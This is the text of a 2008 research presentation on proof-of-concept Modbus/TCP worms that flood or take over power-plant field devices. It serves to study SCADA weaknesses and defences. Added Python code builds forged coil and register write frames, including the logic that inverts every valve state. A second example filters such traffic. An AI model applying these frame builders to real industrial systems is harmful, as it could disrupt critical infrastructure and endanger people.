Scada Malware, A Proof of Concept
A. Carcano, I. Nai Fovino, M. Masera, A. Trombetta
European Commission Joint Research Centre
Critis 2008, Rome, October 15, 2008

Source: critis08.dia.uniroma3.it/pdf/CRITIS_08_27.pdf



Outline

• Motivations

• Testing Environment

• Experimental Program

• Results

• Conclusion

CI Dependence on IT Systems

• Today most critical infrastructures depend heavily on the underlying communication networks.

Figure: generic SCADA architecture. A Central Monitoring Unit talks over the Communications Network (fiber, radio, modem, microwave, telephone, wireless, powerline carrier) to Remote Terminal Unit 1, Remote Terminal Unit 2 and a Programmable Logic Controller, each with its own sensors. Adapted from: Joint Program Office for Special Technology Countermeasures, Naval Surface Warfare Center, Dahlgren Division.

- Remote control
- Remote maintenance
- New features

but also:

- New vulnerabilities
- New attack scenarios
- New threats

Computer Attacks

• Most attacks are malware based: viruses, worms, trojans.

Figure: reference power plant architecture used in the study. At the bottom, the field bus with actuators/transducers and the control system of the turbo-gas unit (combustion chamber fed with air and gas, gas turbine, compressor, steam generator, steam turbine, generator G, with fumes, water and steam flows); field control and turbo-gas control exchange commands, alarms and blocks with the process network (supervision, monitoring, diagnostics, vibrations, common services, gateway) and with plant control; above it the data network with data server and DMZ, separated by two firewalls; a router to the intranet/office network with workstations; and a router to the external network.

Known Effects / Unknown Effects

Need for concrete studies on the effects of malware on critical infrastructures.

Problems

• How to simulate malware on critical infrastructures?

• How and where to study its effects?

Malware Simulation: MAlSim Toolkit

• Various families of malware (worms, viruses, malicious mobile code etc.)

• Various species of malware of the same family (e.g. macro viruses, metamorphic and polymorphic viruses etc.)

• Well-known malware (e.g. Code Red, Nimda, SQL Slammer)

• Non-existent configurations

Power Plant Simulator

Figure: power plant simulator. Power plant environment: field network, process network, data network, DMZ network, intranet network. Attack source: inside or outside. Supporting components: system measurements, analysis systems, vulnerabilities repository, binaries repository, InSAW, experiments archive.

Ad-Hoc SCADA Malware

Considerations About "SCADA" Protocols

Such protocols are normally used by dedicated servers to send commands to the field devices: ModBUS, DNP3, ProfiBUS, ... others.

ModBUS (the protocol targeted in the following scenarios):

- Application layer messaging protocol
- Provides a client/server communication service
- TCP/IP implementation
- Widely used

Lack of:

- Integrity controls
- Authentication mechanisms
- Non-repudiation mechanisms
- Anti-replay mechanisms

Any host that can reach the Modbus/TCP port of a slave can therefore issue the same read and write requests as the legitimate master. It is possible to create a set of malware that takes advantage of such basic vulnerabilities.

Attack Scenarios (1)

ModBUS Malware DOS

• Attack scope:
- To desynchronize the communication between master and slave
- To completely block the communication stream between master and slaves

• Code implementation:
- A packet builder, which forges well-formed ModBUS over TCP packets.
- A discovery engine, which explores the network in order to identify the IP addresses of the Modbus slaves.
- A packet deliverer, which sends the forged packets to the target slaves in an optimized way, in order to saturate the bandwidth as soon as possible.

• Infection trigger (diagram): an FW-VPN or Master/Secondary link. The ModBus DOS Worm combines the Slammer infection engine with the Modbus packet generator and the discovery engine, and is run inside the MalSim framework (Slammer, Nimda, Poskiwing (6 October), ...).

Test Results

1. Anti-virus products do not recognize the ad-hoc crafted malware.

2. Firewalls do not stop the traffic generated by the malware, since it has the shape of legitimate ModBUS traffic.

Attack Scenarios (2)

ModBUS COM Worm

• Attack scope: to take control of the slaves of the process control architecture by taking advantage of the lack of authentication and integrity countermeasures in the ModBUS protocol.

• Code implementation:
- A packet builder
- A discovery engine
- A strategy & analysis module, which, on the basis of the information gathered by the discovery engine and some built-in heuristics, identifies the strategy to adopt in order to send packets that could damage the system.
- A packet deliverer, which sends the forged packets to the target slaves

Experimental tests

• Worm prototypes:
- Step 1 malware: it issues MODBUS function 15 (0x0F), Write Multiple Coils, used to force each coil in a sequence of coils to either ON or OFF in a remote device (valve).
- Step 2 malware: through function 16 (0x10), Write Multiple Registers, it writes a block of 1 to 123 contiguous holding registers in a remote device (the function writes holding registers; input registers are read-only in Modbus).
- Step 3 malware: by combining the two ModBUS functions 0x01 (Read Coils, which returns the current output values) and 0x0F (Write Multiple Coils), it completely inverts the configuration of the target system (e.g. if a valve is open it will be closed and vice versa).
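All three steps, like the packet builder of Attack Scenario (1), reduce to forging well-formed Modbus/TCP frames. The following is an added example, not the authors' MAlSim code (which the paper does not show): it builds the three function codes the steps use and carries out the Step 3 read-then-invert logic on a constructed slave response. The coil addresses, the unit identifier and the sample response are assumptions chosen for illustration; the quantity limits are those of the Modbus application protocol specification.

```python
"""Modbus/TCP frame construction and parsing (added example, not the paper's code)."""
import struct

# Function codes used by the three worm steps (Modbus Application Protocol V1.1b).
FC_READ_COILS = 0x01                 # step 3: read current coil states
FC_WRITE_MULTIPLE_COILS = 0x0F       # step 1 and step 3: force a run of coils
FC_WRITE_MULTIPLE_REGISTERS = 0x10   # step 2: write a run of holding registers

# Quantity limits from the specification; a conforming slave answers
# exception 03 (illegal data value) when they are exceeded.
MAX_COILS_PER_READ = 2000
MAX_COILS_PER_WRITE = 1968
MAX_REGISTERS_PER_WRITE = 123


def mbap(transaction_id: int, unit_id: int, pdu: bytes) -> bytes:
    """Prepend the 7-byte MBAP header: transaction id, protocol id 0,
    length (unit id + PDU), unit id. Nothing in it identifies or
    authenticates the sender, which is the weakness the worms exploit."""
    return struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id) + pdu


def pack_coils(bits) -> bytes:
    """Pack 0/1 values LSB-first into the byte layout FC 0x01/0x0F use."""
    out = bytearray((len(bits) + 7) // 8)
    for i, bit in enumerate(bits):
        if bit:
            out[i // 8] |= 1 << (i % 8)
    return bytes(out)


def read_coils(start: int, quantity: int, tid: int = 1, unit: int = 1) -> bytes:
    if not 1 <= quantity <= MAX_COILS_PER_READ:
        raise ValueError("FC 0x01 quantity must be 1..2000")
    return mbap(tid, unit, struct.pack(">BHH", FC_READ_COILS, start, quantity))


def write_multiple_coils(start: int, bits, tid: int = 1, unit: int = 1) -> bytes:
    if not 1 <= len(bits) <= MAX_COILS_PER_WRITE:
        raise ValueError("FC 0x0F quantity must be 1..1968")
    data = pack_coils(bits)
    pdu = struct.pack(">BHHB", FC_WRITE_MULTIPLE_COILS, start, len(bits), len(data)) + data
    return mbap(tid, unit, pdu)


def write_multiple_registers(start: int, values, tid: int = 1, unit: int = 1) -> bytes:
    if not 1 <= len(values) <= MAX_REGISTERS_PER_WRITE:
        raise ValueError("FC 0x10 quantity must be 1..123")
    data = b"".join(struct.pack(">H", v & 0xFFFF) for v in values)
    pdu = struct.pack(">BHHB", FC_WRITE_MULTIPLE_REGISTERS, start, len(values), len(data)) + data
    return mbap(tid, unit, pdu)


def parse_read_coils_response(frame: bytes, quantity: int) -> list:
    """Decode an FC 0x01 response into a list of coil states."""
    _tid, _proto, length, _unit = struct.unpack(">HHHB", frame[:7])
    pdu = frame[7:7 + length - 1]
    if pdu[0] & 0x80:
        raise ValueError(f"slave returned exception code {pdu[1]}")
    if pdu[0] != FC_READ_COILS:
        raise ValueError("not a read-coils response")
    data = pdu[2:2 + pdu[1]]
    return [(data[i // 8] >> (i % 8)) & 1 for i in range(quantity)]


def invert_coils_request(read_response: bytes, start: int, quantity: int,
                         tid: int = 2, unit: int = 1) -> bytes:
    """Step 3 logic: take the slave's answer to a read of `quantity` coils
    at `start` and build the FC 0x0F request that writes back the complement
    (every open valve closed and vice versa)."""
    current = parse_read_coils_response(read_response, quantity)
    return write_multiple_coils(start, [1 - b for b in current], tid=tid, unit=unit)


# Constructed slave response to read_coils(0, 10): coils 0, 1 and 3 are ON
# (data bytes 0x0B 0x00). This is sample input, not a captured packet.
SAMPLE_READ_RESPONSE = bytes.fromhex("0001000000050101020b00")

if __name__ == "__main__":
    print("read request  :", read_coils(0, 10).hex())
    print("coil states   :", parse_read_coils_response(SAMPLE_READ_RESPONSE, 10))
    print("invert request:", invert_coils_request(SAMPLE_READ_RESPONSE, 0, 10).hex())
```

The MBAP header carries only a transaction id, a protocol id, a length and a unit id, so the inverted write is indistinguishable from one the real master would send; the only thing the quantity checks buy the attacker is that the slave does not reject the frame with exception 03.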

Experimental Considerations

• Anti-virus products do not identify the new worms.

• The firewall completely ignores the attacks, since the traffic appears completely legal.

• In all cases the slaves execute every worm command without identifying any anomaly.
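Why the firewall lets every one of these frames through, and what a protocol-aware check would catch instead, as an added example that is not part of the paper (the SCADA intrusion detection system appears there only as future work). The host addresses, the allowed-master list, the sample frames and the flood threshold are constructed for illustration.

```python
"""Function-code-aware inspection of Modbus/TCP frames (added example)."""
import struct

MODBUS_TCP_PORT = 502
READ_FUNCTION_CODES = {0x01, 0x02, 0x03, 0x04}
WRITE_FUNCTION_CODES = {0x05, 0x06, 0x0F, 0x10}


def port_filter(dst_port: int) -> str:
    """What a stateless L4 firewall rule ("allow tcp/502 into the process
    network") decides: it never looks inside the payload."""
    return "allow" if dst_port == MODBUS_TCP_PORT else "deny"


def parse_mbap(frame: bytes):
    """Split a Modbus/TCP frame into (transaction id, unit id, PDU),
    rejecting frames whose MBAP header is inconsistent."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header plus function code")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError(f"protocol id {proto} is not Modbus")
    if length != len(frame) - 6:            # length covers unit id + PDU
        raise ValueError("MBAP length does not match frame size")
    return tid, unit, frame[7:]


def inspect_modbus(src_ip: str, dst_port: int, frame: bytes, allowed_masters) -> tuple:
    """Protocol-aware decision: (verdict, reason). Write function codes are
    accepted only from the hosts in allowed_masters; malformed frames and
    function codes outside the policy are dropped."""
    if port_filter(dst_port) == "deny":
        return ("deny", "port not allowed")
    try:
        _tid, _unit, pdu = parse_mbap(frame)
    except ValueError as err:
        return ("deny", f"malformed: {err}")
    fc = pdu[0]
    if fc in WRITE_FUNCTION_CODES and src_ip not in allowed_masters:
        return ("deny", f"write function 0x{fc:02X} from non-master {src_ip}")
    if fc not in READ_FUNCTION_CODES | WRITE_FUNCTION_CODES:
        return ("deny", f"function 0x{fc:02X} not in policy")
    return ("allow", "ok")


def flood_sources(timestamps_by_src: dict, window: float, threshold: int) -> set:
    """Flag sources that send more than `threshold` frames inside any
    `window` seconds (sliding window over sorted timestamps). Rate is the
    only signal the DOS worm leaves: each of its frames is individually valid."""
    flagged = set()
    for src, ts in timestamps_by_src.items():
        lo = 0
        for hi in range(len(ts)):
            while ts[hi] - ts[lo] > window:
                lo += 1
            if hi - lo + 1 > threshold:
                flagged.add(src)
                break
    return flagged


# Constructed traffic: 10.0.0.10 is the real master, 10.0.0.77 the infected
# operator PC. The write frame is byte-for-byte identical from both hosts.
SAMPLE_TRAFFIC = [
    ("10.0.0.10", 502, bytes.fromhex("00010000000601010000000a")),        # master: read 10 coils
    ("10.0.0.10", 502, bytes.fromhex("000200000009010f0000000a02f403")),  # master: write 10 coils
    ("10.0.0.77", 502, bytes.fromhex("000200000009010f0000000a02f403")),  # worm: the same write
    ("10.0.0.77", 502, bytes.fromhex("00010000000601010000000a")),        # worm discovery: read
    ("10.0.0.77", 502, bytes.fromhex("00010001000601010000000a")),        # protocol id 1: malformed
]


def compare(traffic, allowed_masters):
    """Side by side: port-filter verdict vs. protocol-aware verdict per frame."""
    return [(port_filter(port), inspect_modbus(src, port, frame, allowed_masters)[0])
            for src, port, frame in traffic]


if __name__ == "__main__":
    for (src, _port, _frame), row in zip(SAMPLE_TRAFFIC, compare(SAMPLE_TRAFFIC, {"10.0.0.10"})):
        print(src, row)
```

The port filter allows all five frames, which is the result reported above. The protocol-aware check stops the worm's write and the malformed frame, but still passes the worm's discovery read: a policy keyed on write function codes alone does not see reconnaissance, and only the rate check in flood_sources would notice the DOS worm, whose frames are all well-formed.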

Conclusion

• Industrial SCADA protocols are far from secure.

• In this paper we showed that the scenario in which a worm takes control of a portion of an industrial plant is nowadays a reality.

• Traditional anti-virus products and firewalls are inadequate for several reasons:
– SCADA systems are very specialized systems, using dedicated (sometimes proprietary) protocols.
– Anomaly detection techniques cannot be easily deployed in industrial systems.
– Patches could interfere with particular ad-hoc software.

• Future work:
- SCADA intrusion detection system
- Secure SCADA protocols

Considerations (1)

• Old operating systems: Win NT 3.0/4.0, Win 2000, BSD, SCO, ...

• Rare patching policies

• Low "ICT security perception"

Considerations about Process Sub-Systems

• Process sub-systems are typically prone to traditional malware.

• Consequences of pervasive ICT:
- Software vulnerabilities
- Architectural vulnerabilities
- ICT security policy vulnerabilities

• Consequences:
- New attack scenarios
- New risks
- Old safety studies no longer "actual" (up to date)
- Need for new models
- Need for new risk assessment methods
- Need for new experimental studies

Attack Scenarios (1): infection triggers (diagram)

• Infection triggers: E-mail, FW-VPN, Master/Secondary.
- E-mail path: social engineering (e-mail forgery, malware camouflage) and phishing (fake site creation, DNS poisoning) lead to operator PC infection.
- Payload: the ModBus DOS Worm, built from the Slammer infection engine, the Modbus packet generator and the discovery engine.
- Run in the MalSim framework alongside Slammer, Nimda, Poskiwing (6 October), ...